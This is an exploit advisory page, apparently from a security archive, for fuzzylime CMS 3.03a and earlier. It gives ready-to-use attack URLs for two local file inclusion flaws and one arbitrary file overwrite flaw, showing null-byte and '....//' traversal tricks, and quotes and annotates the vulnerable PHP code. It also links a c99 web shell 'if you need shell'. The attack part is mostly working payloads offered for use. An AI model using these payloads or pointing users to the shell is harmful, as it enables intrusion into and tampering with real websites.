fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC

2009.06.23
Credit: xhaxkerx
Risk: High
Local: No
Remote: Yes
CWE: N/A

+------------------------------------------------------------------------+ | fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc | +-----------+------------------------------------------------------------+ | by staker | +-----------+---------------------+ Author : xhaxkerx Special Thankz : yasin site : http://www.c99.mobi +---------------------------------+ [1][LFI] http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte } Vulnerable code: confirm.php (local file inclusion mq=off) ----------------------------------------------------------------- 1. <? 2. &#64;extract($HTTP_GET_VARS); <-------- {1} 3. &#64;extract($_GET); <----------^ 27. elseif(isset($e)) { <------- {2} 28. $filename = "code/mailing/$list.inc.php"; <------- {3} 29. &#64;include $filename; <------- {4} ----------------------------------------------------------------- 1. extract() allows to overwrite any not-defined variable via get therefore it works regardless of register_globals settings. 2. $e is a variable not defined,therefore become $_GET['e'] 3. $list is a variable not defined,therefore become $_GET['list'] 4. $filename contains $list variable that will be required ----------------------------------------------------------------- [2][LFI] http://[target]/[path]/code/display.php?template= {file + nullbyte} Vulnerable code: display.php (local file inclusion mq=0 & reg=on) -------------------------------------------------------------------- 98. if($_GET['print'] != "1") include "templates/${template}_f.php"; -------------------------------------------------------------------- [3][LFC] http://[target]/[path]/code/display.php?usecache=1&s=....//settings http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off) Vulnerable code: display.php (local file corruption register_gl=1) ----------------------------------------------------------------- 1. <? 2. $s = $_GET[s]; 3. $p = $_GET[p]; 4. $s = str_replace("../", "", $s); <---------- {1} 5. $p = str_replace("../", "", $p); ... 54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2} 100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3} 101. if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4} 102. $output = ob_get_contents(); 103. fputs($handle, $output); 104. 105. fclose($handle); 106. } 107. } ---------------------------------------------------------------------- 1. you have to use ....// to change directory because of 1st point. so ....// will be ../ 2. $cachefile contains $s variable 3. if $usecache == 1 we will go ahead 4. you will overwrite a file typing the name via $s variable. ----------------------------------------------------------------------- if you need shell http://www.c99.mobi/c99.txt [x] http://www.youtube.com/watch?v=h3DQmJOkSY0

References:

http://www.youtube.com/watch?v=h3DQmJOkSY0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top